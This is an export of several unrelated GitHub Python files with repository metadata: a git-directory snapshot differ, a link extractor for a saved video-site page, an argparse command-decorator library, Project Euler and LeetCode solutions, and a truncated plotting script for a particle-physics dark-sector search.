s = 'Difference Object: {} -> {}'.format(self.fst.message, self.snd.message)\n elif self.snd:\n s = 'Difference Object - New Snapshot: {}'.format(self.snd.message)\n s = '{0: ^78}'.format(s)\n\n print('|' + s + '|')\n print('+' + '-' * 78 + '+')\n\n print('| created [{}]:'.format(len(self.created)))\n for o in sorted(self.created):\n print('| ', o)\n print('| modified [{}]:'.format(len(self.modified)))\n for o in sorted(self.modified):\n print('| ', o)\n print('| removed [{}]:'.format(len(self.removed)))\n for o in sorted(self.removed):\n print('| ', o)\n\n if not updated_only:\n print('| static [{}]:'.format(len(self.static)))\n for o in sorted(self.static):\n print('| ', o)\n print('+' + '-' * 78 + '+')\n\n\nclass GitDirSnapshot:\n \"\"\"\n GitDirSnapshot holds a snapshot of the .git directory. This is the raw\n content and has little semantic meaning without being processed by a\n GitDir instance\n \"\"\"\n\n def __init__(self, dir_to_parse, message='', verbose=True):\n self.entries = {}\n if message:\n self.message = message\n else:\n self.message = \"{}\".format(datetime.now().strftime('%m/%d/%y %H:%M:%S'))\n gdp = GitDirParser(dir_to_parse, verbose)\n for entry in gdp.entries:\n self.entries[entry.name] = entry\n\n def parse_git_directory(self, dir_to_parse):\n pass\n\n def diff(self, other):\n \"\"\" assuming that self is newer than other, calculate the difference\n in the .git directory tree\n \"\"\"\n pass\n\n def __str__(self):\n return 'Snapshot[{}]'.format(self.message)\n\n def __repr__(self):\n return 'Snapshot[{}] with {} entries'.format(self.message, len(self.entries))\n\n\nclass GitDirLog:\n \"\"\" Takes a snapshot of the .git directory \"\"\"\n\n def __init__(self, gitdir, autodiff=True):\n \"\"\"\n gitdir: directory to track\n autodiff: track diffs (and print them) automatically\n \"\"\"\n self.snapshots = []\n self.gitdir = gitdir\n self.autodiff = autodiff\n self.diffs = None # Default, we don't store diffs\n\n if autodiff:\n self.diffs = []\n\n def take_snapshot(self, message='', verbose=True):\n snap = GitDirSnapshot(self.gitdir, message, verbose)\n self.snapshots.append(snap)\n if self.autodiff:\n if len(self.snapshots) > 1:\n s1, s2 = self.snapshots[-2:]\n else:\n s1, s2 = None, self.snapshots[-1]\n diff = DiffObject(s1, s2)\n self.diffs.append(diff)\n if verbose:\n diff.print_diff()\n\n return snap\n\n def compute_diffs(self):\n diffs = []\n if len(self.snapshots) > 0:\n s1, s2 = None, self.snapshots[-1]\n diffs = [DiffObject(s1, s2)] # Seed initial diff\n for i in range(1, len(self.snapshots)):\n s1, s2 = self.snapshots[i - 1], self.snapshots[i]\n diffs.append(DiffObject(s1, s2))\n return diffs\n\n def print_diffs(self, start=0, end=-1):\n print(\"-=\" * 40)\n print(\"| Printing Difference Objects |\")\n print(\"-=\" * 40)\n for diff in self.compute_diffs()[start:end]:\n diff.print_diff()\n","repo_name":"bkushigian/hog","sub_path":"src/snapshots.py","file_name":"snapshots.py","file_ext":"py","file_size_in_byte":9331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24832327219","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : facebook_extractor.py\n# @Author: Cedar\n# @Date : 2020/12/16\n# @Desc :\n\nfrom lxml import etree\nfrom requests.compat import urljoin\n\n\nwith open('seseporn.html', 'r', encoding='utf-8') as f:\n html = f.read()\n\nroot = etree.HTML(html)\nitems = root.xpath('//a/@href')\nresult = []\nfor item in items:\n url = urljoin('https://www.xvideos.com/', item)\n if 'https://www.xvideos.com/video' in url and 'videos-i-like' not in url:\n result.append(url)\n\nresult_set = set(result)\nresult = list(result_set)\nprint(result)\nprint(len(result))\n","repo_name":"wschxida/test","sub_path":"you-dl/xvideos.py","file_name":"xvideos.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10637466215","text":"'''Decorators/functions for turning functions into command line arguments'''\nfrom collections import OrderedDict\nfrom argparse import ArgumentParser\nfrom functools import wraps\n\n\n_commands = OrderedDict()\n_main_commands = OrderedDict()\n\n\ndef main_command(*dec_args, **dec_kwargs):\n '''Decorator for adding to main function (entry point)\n\n Should only be applied to one function'''\n return _store_command(dec_args, dec_kwargs, _main_commands)\n\n\ndef command(*dec_args, **dec_kwargs):\n '''Decorator for adding to sub commands'''\n return _store_command(dec_args, dec_kwargs, _commands)\n\n\ndef _store_command(dec_args, dec_kwargs, command_container):\n if len(dec_args) == 1 and callable(dec_args[0]):\n func = dec_args[0]\n command_container[func.__name__] = (func, [], {})\n\n # Preserve e.g. docstring.\n @wraps(func)\n def decorator_wrapper(*func_args, **func_kwargs):\n return func(*func_args, **func_kwargs)\n return decorator_wrapper\n else:\n\n def decorator(func):\n command_container[func.__name__] = (func, dec_args, dec_kwargs)\n\n # Preserve e.g. docstring.\n @wraps(func)\n def decorator_wrapper(*func_args, **func_kwargs):\n return func(*func_args, **func_kwargs)\n return decorator\n\n\nclass _NoDefaultClass(object):\n '''private class used to indicate that there is no default\n\n Better than using None'''\n pass\n\n\nclass CommandifyError(Exception):\n '''Exceptions thrown by commandify'''\n def __init__(self, message, error_type='code'):\n super(CommandifyError, self).__init__(message)\n if error_type not in ['code', 'user']:\n raise Exception('Error type {0} not understood'.format(error_type))\n self.error_type = error_type\n\n\nclass CommandifyArgumentParser(ArgumentParser):\n def __init__(self, provide_args={}, guess_type=True,\n suppress_warnings=[], *args, **kwargs):\n super(CommandifyArgumentParser, self).__init__(*args, **kwargs)\n self.provide_args = provide_args\n self.guess_type = guess_type\n self.suppress_warnings = suppress_warnings\n self.replaced_bool_args = []\n\n def _warn(self, kind, message):\n if kind not in self.suppress_warnings:\n print('COMMANDIFY WARNING: {0}'.format(message))\n print('...Disable warning by passing suppress_warnings=[\"{0}\"]'\n .format(kind))\n\n def setup_arguments(self):\n try:\n if len(_main_commands) == 0:\n raise CommandifyError('No main_command defined\\n'\n 'Please add the @main_command decorator '\n 'to one function')\n elif len(_main_commands) > 1:\n raise CommandifyError('More than one main_command defined\\n'\n 'Please add the @main_command decorator '\n 'to only one function')\n\n # Setup main command.\n main_command, main_args, main_kwargs =\\\n list(_main_commands.values())[0]\n main_doc = main_command.__doc__\n description = main_doc.split('\\n')[0] if main_doc else None\n self._add_commands_to_parser(main_command, self,\n main_args, main_kwargs)\n\n if len(_commands):\n # Setup subcommands.\n subparsers = self.add_subparsers(dest='command')\n for name, (command, dec_args, dec_kwargs) in _commands.items():\n if command.__doc__:\n help = command.__doc__.split('\\n')[0]\n else:\n help = None\n subparser = subparsers.add_parser(name, help=help)\n self._add_commands_to_parser(command, subparser,\n dec_args, dec_kwargs)\n\n except CommandifyError as e:\n if e.error_type == 'user':\n self.print_help()\n self.exit(status=1,\n message='{0}: error: {1}\\n'.format(self.prog, e))\n\n def _add_commands_to_parser(self, command, parser, dec_args, dec_kwargs):\n # Work out defaults for each command, set all defaults to\n # _NoDefaultClass then loop over default args (as defined in function\n # signature) settings them as necessary.\n defaults = [_NoDefaultClass] * command.__code__.co_argcount\n if command.__defaults__:\n for i in range(1, len(command.__defaults__) + 1):\n defaults[-i] = command.__defaults__[-i]\n\n # Loop over varnames (function argument names *and* local vars)\n # and defaults, adding an argparse argument.\n command_argument_names =\\\n command.__code__.co_varnames[:command.__code__.co_argcount]\n for varname, default in zip(command_argument_names, defaults):\n if varname == 'args' or varname in self.provide_args:\n # args is ignored so its default should not be set.\n if default != _NoDefaultClass:\n raise CommandifyError(\n 'Should not set a default value for args keyword')\n else:\n continue\n # Get the decorator arguments which will be used in\n # parser.add_argument(...).\n if varname in dec_kwargs:\n arg_kwargs = dec_kwargs.pop(varname)\n else:\n arg_kwargs = {}\n\n argname = varname.replace('_', '-')\n arg_args = ['--{0}'.format(argname)]\n # 'flag' is a special arg. keyword, it (e.g. 'flag': '-a')\n if 'flag' in arg_kwargs:\n flag = arg_kwargs.pop('flag')\n arg_args.append(flag)\n\n # Default can either be set in the function arguments or as a an\n # option to the command(...) decorator.\n if 'default' in arg_kwargs and default != _NoDefaultClass:\n raise CommandifyError('default set twice for func/method {0}'\n .format(command.__name__))\n if 'default' in arg_kwargs:\n default = arg_kwargs.pop('default')\n\n # Add the command line argument.\n if default != _NoDefaultClass:\n if self.guess_type and 'type' not in arg_kwargs:\n default_type = type(default)\n if default_type == bool:\n if default:\n self._warn('default_true',\n 'Setting {0} to not-{0}'\n .format(argname))\n # arg_kwargs['action'] = 'store_false'\n # Idea: replace arg_args[0] with something like:\n # arg_args[0] = '--not-' + arg_args[0][2:]\n # Then handle this on parse_args.\n negated_arg = '--not-' + arg_args[0][2:]\n self.replaced_bool_args.append(varname)\n arg_args[0] = negated_arg\n arg_kwargs['action'] = 'store_true'\n default = False\n else:\n arg_kwargs['action'] = 'store_true'\n elif not isinstance(default_type, type(None)):\n arg_kwargs['type'] = default_type\n parser.add_argument(*arg_args, default=default, **arg_kwargs)\n else:\n # Any arguments without a default are required.\n parser.add_argument(*arg_args, required=True, **arg_kwargs)\n # Check all decorator args have been accounted for.\n if dec_kwargs:\n raise CommandifyError('Unexpected command options: {0}'\n .format(', '.join(dec_kwargs.keys())))\n\n def parse_args(self, *args, **kwargs):\n self.args = super(CommandifyArgumentParser, self).parse_args(*args,\n **kwargs)\n # Replace not_some_arg=True with some_arg=False.\n for varname in self.replaced_bool_args:\n neg_varname = 'not_' + varname\n if neg_varname in self.args:\n neg_val = self.args.__dict__.pop(neg_varname)\n self.args.__dict__[varname] = not neg_val\n\n return self.args\n\n def dispatch_commands(self):\n try:\n if len(_commands):\n if self.args.command is None:\n raise CommandifyError('too few arguments', 'user')\n\n # Get arguments for both commands.\n # Bad choice of name: main_command, clashes with function.\n main_command, main_args, main_kwargs =\\\n list(_main_commands.values())[0]\n main_command_args = self._get_command_args(main_command, self.args)\n if len(_commands):\n command, _, _ = _commands[self.args.command]\n command_args = self._get_command_args(command, self.args)\n\n # Run commands.\n main_ret = main_command(**main_command_args)\n self.args.main_ret = main_ret\n if len(_commands):\n command_ret = command(**command_args)\n return main_ret, command_ret\n else:\n return main_ret, None\n\n except CommandifyError as e:\n if e.error_type == 'user':\n self.print_help()\n self.exit(status=1,\n message='{0}: error: {1}\\n'.format(self.prog, e))\n\n def _get_command_args(self, command, args):\n '''Work out the command arguments for a given command'''\n command_args = {}\n command_argument_names =\\\n command.__code__.co_varnames[:command.__code__.co_argcount]\n\n for varname in command_argument_names:\n if varname == 'args':\n command_args['args'] = args\n elif varname in self.provide_args:\n command_args[varname] = self.provide_args[varname]\n else:\n command_args[varname] = getattr(args, varname)\n return command_args\n\n\ndef commandify(use_argcomplete=False, exit=True, *args, **kwargs):\n '''Turns decorated functions into command line args\n\n Finds the main_command and all commands and generates command line args\n from these.'''\n parser = CommandifyArgumentParser(*args, **kwargs)\n parser.setup_arguments()\n if use_argcomplete:\n try:\n import argcomplete\n except ImportError:\n print('argcomplete not installed, please install it.')\n parser.exit(status=2)\n # Must happen between setup_arguments() and parse_args().\n argcomplete.autocomplete(parser)\n args = parser.parse_args()\n if exit:\n parser.dispatch_commands()\n parser.exit(0)\n else:\n return parser.dispatch_commands()\n","repo_name":"markmuetz/commandify","sub_path":"commandify/commandify.py","file_name":"commandify.py","file_ext":"py","file_size_in_byte":11105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13367402022","text":"from math import sqrt, floor\n\ndef diag(n):\n lista = []\n counter = 1\n j = 0\n while True:\n j += 1\n for i in range(1,5):\n lista.append(counter)\n counter = counter + 2*j\n if counter>n:\n return lista\n\ndef sieve(n):\n primes = [True for i in range(n)]\n primes[0] = False\n primes[1] = False\n for i in range(2,floor(sqrt(n))+1):\n if primes[i] == True:\n for j in range(i**2,n,i):\n primes[j] = False\n return primes\n\nn = 30000\nbiglist = sieve(n**2+1)\ndiagona = diag(n**2)\n\nm = 25000\nwhile True:\n m +=1\n suma = 0\n dlugosc = 1+4*(m-1)/2\n for i in range(1,int(dlugosc)):\n if biglist[diagona[i]] == True:\n suma += 1\n if m%10**3 == 0:\n print(m,suma/dlugosc)\n if(suma/dlugosc<0.1):\n print(m)\n break\n","repo_name":"098799/project_euler","sub_path":"archive/058/spiral.py","file_name":"spiral.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71467035346","text":"# 80. Remove Duplicates from Sorted Array II\n\nclass Solution:\n def removeDuplicates(self, nums: int) -> int:\n if len(nums) <= 2:\n return len(nums)\n\n currentIndex = 2\n for i in range(2, len(nums)):\n if (nums[i] != nums[currentIndex - 2]):\n nums[currentIndex] = nums[i]\n currentIndex += 1\n\n return currentIndex\n \n\nexercise = Solution()\ninput = [0,0,0,1,1,1,1,2,2,2,2,2,2,3,3,3,4,4,4,4,4,5,5,6]\nexpected_output = 13\noutput = exercise.removeDuplicates(input)\nprint(output, input[:output])\nassert output == expected_output, \"Wrong answer\"\nprint(\"Accepted\")\n","repo_name":"JaviBT/leetcode-problems","sub_path":"problems/_80_leetcode.py","file_name":"_80_leetcode.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8745061979","text":"import ROOT\nROOT.gROOT.SetBatch(True)\nimport math\nimport utils.DataSetInfo as info\nimport optparse\nimport copy\nimport os\nfrom array import array\nimport numpy as np\nimport utils.CMS_lumi as CMS_lumi\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport pandas as pd\nfrom utils.var import var as vars\n# from utils.variables import variables as vars\n\nmpl.rc(\"font\", family=\"serif\", size=15)\n\n# color definition, needed for python plots for consistent color scheme\ncolorDict = {\n (ROOT.kGray + 1): \"#999999\",\n (ROOT.kYellow + 1): \"#cccc19\",\n (ROOT.kBlue - 6): \"#6666cc\",\n (ROOT.kGreen + 1): \"#4bd42d\",\n (ROOT.kMagenta + 1): \"#cd2bcc\",\n (ROOT.kOrange+2): \"#cc660d\",\n (ROOT.kRed): \"#f2231b\",\n (ROOT.kViolet-1): \"#9a27cc\",\n (ROOT.kOrange+3): \"#663303\",\n (ROOT.kPink+1): \"#f69acc\",\n (ROOT.kGray): \"#cccccc\",\n (ROOT.kYellow+2): \"#999910\",\n (ROOT.kCyan): \"#5efdff\",\n}\n\n# signal vs. background figure of merit\ndef fom(S,B):\n return np.sqrt(2 * ( (S+B) * np.log(1+S/B) - S) )\n\ndef signif(S,B):\n return S/(np.sqrt( B + (0.3*B)**2 ))\n\ndef getLabel(label):\n si = label.find(\"(\")\n sourceLabel = label[:si-1]\n return sourceLabel\n\ndef makeDirs(plotOutDir,cut,plotType):\n if not os.path.exists(plotOutDir+\"/\"+plotType+\"/\"+cut[1:]):\n os.makedirs(plotOutDir+\"/\"+plotType+\"/\"+cut[1:])\n\ndef find_nearest(trgeff, target):\n trgeff = np.asarray(trgeff)\n idx = (np.abs(trgeff - target)).argmin()\n return int(trgeff[idx])\n\ndef divisorGenerator(n):\n large_divisors = []\n for i in range(1, int(np.sqrt(n) + 1)):\n if n % i == 0:\n yield i\n if i*i != n:\n large_divisors.append(n / i)\n for divisor in reversed(large_divisors):\n yield divisor\n\ndef rebinCalc(nBins,target):\n rebinFloat = nBins/float(target)\n allDivs = list(divisorGenerator(nBins))\n return find_nearest(allDivs, rebinFloat)\n\ndef normHisto(hist, doNorm=False):\n if doNorm:\n if hist.Integral() > 0:\n hist.Scale(1.0/hist.Integral())\n\ndef simpleSig(hSig, hBg):\n sig = 0.0\n for i in range(0, hSig.GetNbinsX()):\n totBG = hBg.GetBinContent(i)\n nSig = hSig.GetBinContent(i)\n if(totBG > 1.0 and nSig > 1.0):\n s = nSig / math.sqrt( totBG + (0.3*totBG)**2 )\n sig = math.sqrt(sig**2 + s**2)\n return sig\n\ndef getBGHistos(data, histoName, rebinx, xmin, xmax):\n hs = ROOT.THStack()\n hMC = None\n hList = []\n firstPass = True\n for d in data[1]:\n h = d.getHisto(histoName, rebinx=rebinx, xmin=xmin, xmax=xmax, fill=True, showEvents=True)\n hist = copy.deepcopy(h)\n hs.Add(hist)\n hList.append((hist, d.legEntry()))\n if(firstPass):\n hMC = hist\n firstPass = False\n else:\n hMC.Add(hist)\n return hs, hMC, hList\n\ndef getData(path, scale=1.0, year = \"2018\"):\n Data = [\n # info.DataSetInfo(basedir=path, fileName=year+\"_DataSR.root\", sys= -1.0, label=\"Data\", scale=scale),\n info.DataSetInfo(basedir=path, fileName=year+\"_DataCR.root\", sys= -1.0, label=\"Data\", scale=scale),\n # info.DataSetInfo(basedir=path, fileName=\"2018_Data.root\", sys= -1.0, label=\"Data\", scale=scale),\n # info.DataSetInfo(basedir=path, fileName=\"2017_Data.root\", sys= -1.0, label=\"Data\", scale=scale),\n # info.DataSetInfo(basedir=path, fileName=\"2016_Data.root\", sys= -1.0, label=\"Data\", scale=scale),\n ]\n # print(\"Data = \",Data)\n\n # qdm_qsmDir = \"condor/testHadd_main_01062022_noEtaCut_pT170_withJetCat_pairProduction\"\n # Normal\n bgData = [\n # info.DataSetInfo(basedir=path, fileName=year+\"_Triboson.root\", label=\"VVV\", scale=scale, color=(ROOT.kGray)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_Diboson.root\", label=\"VV\", scale=scale, color=(ROOT.kMagenta + 1)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_DYJetsToLL_M-50.root\", label=\"Z#gamma*+jets\", scale=scale, color=(ROOT.kOrange + 2)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_TTX.root\", label=\"ttX\", scale=scale, color=(ROOT.kCyan + 1)),\n info.DataSetInfo(basedir=path, fileName=year+\"_ST.root\", label=\"Single top\", scale=scale, color=(ROOT.kRed + 1)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_ZJets.root\", label=\"Z#rightarrow#nu#nu+jets\", scale=scale, color=(ROOT.kGray + 1)),\n \n # info.DataSetInfo(basedir=path, fileName=year+\"_ST_tZq.root\", label=\"ST tZq\", scale=scale, color=(ROOT.kRed)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_ST_s-channel.root\", label=\"ST s-channel\", scale=scale, color=(ROOT.kGreen + 3)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_ST_tW.root\", label=\"ST tW\", scale=scale, color=(ROOT.kPink + 7)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_ST_t-channel.root\", label=\"ST t-channel\", scale=scale, color=(ROOT.kTeal)),\n \n\n info.DataSetInfo(basedir=path, fileName=year+\"_TTJets.root\", label=\"t#bar{t}\", scale=scale, color=(ROOT.kBlue - 6)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_WJets.root\", label=\"W+jets\", scale=scale, color=(ROOT.kYellow + 1)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_QCD.root\", label=\"QCD\", scale=scale, color=(ROOT.kGreen + 1)),\n # full bkg sample\n # info.DataSetInfo(basedir=path, fileName=year+\"_mTTJetsmini_Inc_noEtaCut_pT50.root\", label=\"t#bar{t}\", scale=scale, color=(ROOT.kBlue - 6)),\n info.DataSetInfo(basedir=path, fileName=year+\"_ZJets.root\", label=\"Z#rightarrow#nu#nu+jets\", scale=scale, color=(ROOT.kGray + 1)),\n info.DataSetInfo(basedir=path, fileName=year+\"_WJets.root\", label=\"W+jets\", scale=scale, color=(ROOT.kYellow + 1)),\n # info.DataSetInfo(basedir=path, fileName=year+\"_TT.root\", label=\"t#bar{t} (pow)\", scale=scale, color=(ROOT.kBlue - 6)),\n info.DataSetInfo(basedir=path, fileName=year+\"_QCD.root\", label=\"QCD\", scale=scale, color=(ROOT.kGreen + 1)),\n ]\n #\n sgData = [\n\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-600_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 600\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-1_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-1\",scale=scale, color=ROOT.kCyan),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p1_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p1\",scale=scale, color=ROOT.kGray+3),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"baseline\", scale=scale, color=ROOT.kViolet+2),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-50_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-50\",scale=scale, color=ROOT.kViolet+5),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p5_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p5\",scale=scale, color=ROOT.kYellow),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-4000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 4000\", scale=scale, color=ROOT.kRed),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-100_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-100\",scale=scale, color=ROOT.kPink+9),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p7_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p7\",scale=scale, color=ROOT.kCyan+4),\n\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"t-ch 3000\", scale=scale, color=ROOT.kMagenta+1),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-600_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"t-ch 600\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"t-ch 800\", scale=scale, color=ROOT.kGreen),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"t-ch 2000\", scale=scale, color=ROOT.kBlue),\n # info.DataSetInfo(basedir=path, fileName=\"2017_mZprime-3000_mDark-20_rinv-0p3_alpha-peak.root\", label=\"s-ch baseline\", scale=scale, color=ROOT.kRed),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-6000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"t-ch 6000\", scale=scale, color=ROOT.kCyan,)\n ## varying mMed\n\n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-500_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 500\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-600_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 600\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 800\", scale=scale, color=ROOT.kRed),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-1000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 1000\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-1500_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 1500\", scale=scale, color=ROOT.kGray+4),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"baseline\", scale=scale, color=ROOT.kOrange+2),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 3000\", scale=scale, color=ROOT.kCyan),\n \n # # info.DataSetInfo(basedir=path, fileName=\"2017_mZprime-3000_mDark-20_rinv-0p3_alpha-peak.root\", label=\"s-ch 3000\", scale=scale, color=ROOT.kRed),\n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-4000_mDark-20_rinv-0p3_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"mMed 4000\", scale=scale, color=ROOT.kRed),\n \n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-4000_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"mMed 4000\", scale=scale, color=ROOT.kRed+2),\n \n # ## varying mDark\n\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-1_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-1\",scale=scale, color=ROOT.kViolet-5),\n \n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p3_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"M-3000_mD-20\",scale=scale, color=ROOT.kGreen+2),\n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-50_rinv-0p3_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"M-3000_mD-50\",scale=scale, color=ROOT.kRed),\n \n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-50_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-50\",scale=scale, color=ROOT.kViolet+3),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-100_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-2000_mD-100\",scale=scale, color=ROOT.kViolet+6),\n \n # ## varying rinv\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p1_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p1\",scale=scale, color=ROOT.kOrange+3),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p5_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p5\",scale=scale, color=ROOT.kOrange+9),\n \n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p3_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"M-3000_r-0p3\",scale=scale, color=ROOT.kGreen+2),\n # # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p5_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"M-3000_r-0p5\",scale=scale, color=ROOT.kRed),\n \n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p7_alpha-peak_yukawa-1.root\", label=\"M-2000_r-0p7\",scale=scale, color=ROOT.kOrange-9),\n \n # ## varying alpha\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p3_alpha-low_yukawa-1.root\", label=\"M-2000_a-low\",scale=scale, color=ROOT.kGray),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-3000_mDark-20_rinv-0p3_alpha-peak_yukawa-1_noEtaCut_pT170.root\", label=\"M-3000_a-peak\",scale=scale, color=ROOT.kGreen+2),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-2000_mDark-20_rinv-0p3_alpha-high_yukawa-1.root\", label=\"M-2000_a-high\",scale=scale, color=ROOT.kYellow+2),\n ## varying rinv at mMed 800\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p1_alpha-peak_yukawa-1.root\", label=\"M-800_r-0p1\", scale=scale, color=ROOT.kOrange + 2),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p3_alpha-peak_yukawa-1.root\", label=\"M-800_r-0p3\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p5_alpha-peak_yukawa-1.root\", label=\"M-800_r-0p5\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=path, fileName=year+\"_mMed-800_mDark-20_rinv-0p7_alpha-peak_yukawa-1.root\", label=\"M-800_r-0p7\", scale=scale, color=ROOT.kGreen),\n ## comparing QdM and QsM jets\n # info.DataSetInfo(basedir=\"{}/QdM/\".format(qdm_qsmDir), fileName=year+\"_mMed400.root\", label=\"mMed 400 QdM\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=\"{}/QsM/\".format(qdm_qsmDir), fileName=year+\"_mMed400.root\", label=\"mMed 400 QsM\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=\"{}/QdM/\".format(qdm_qsmDir), fileName=year+\"_mMed600.root\", label=\"mMed 600 QdM\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=\"{}/QsM/\".format(qdm_qsmDir), fileName=year+\"_mMed600.root\", label=\"mMed 600 QsM\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=\"{}/QdM/\".format(qdm_qsmDir), fileName=year+\"_mMed800.root\", label=\"mMed 800 QdM\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=\"{}/QsM/\".format(qdm_qsmDir), fileName=year+\"_mMed800.root\", label=\"mMed 800 QsM\", scale=scale, color=ROOT.kBlack),\n # info.DataSetInfo(basedir=\"{}/QdM/\".format(qdm_qsmDir), fileName=year+\"_mMed1000.root\", label=\"mMed 1000 QdM\", scale=scale, color=ROOT.kMagenta + 1),\n # info.DataSetInfo(basedir=\"{}/QsM/\".format(qdm_qsmDir), fileName=year+\"_mMed1000.root\", label=\"mMed 1000 QsM\", scale=scale, color=ROOT.kBlack),\n\n ]\n # print(sgData, bgData)\n return Data, sgData, bgData\n\ndef 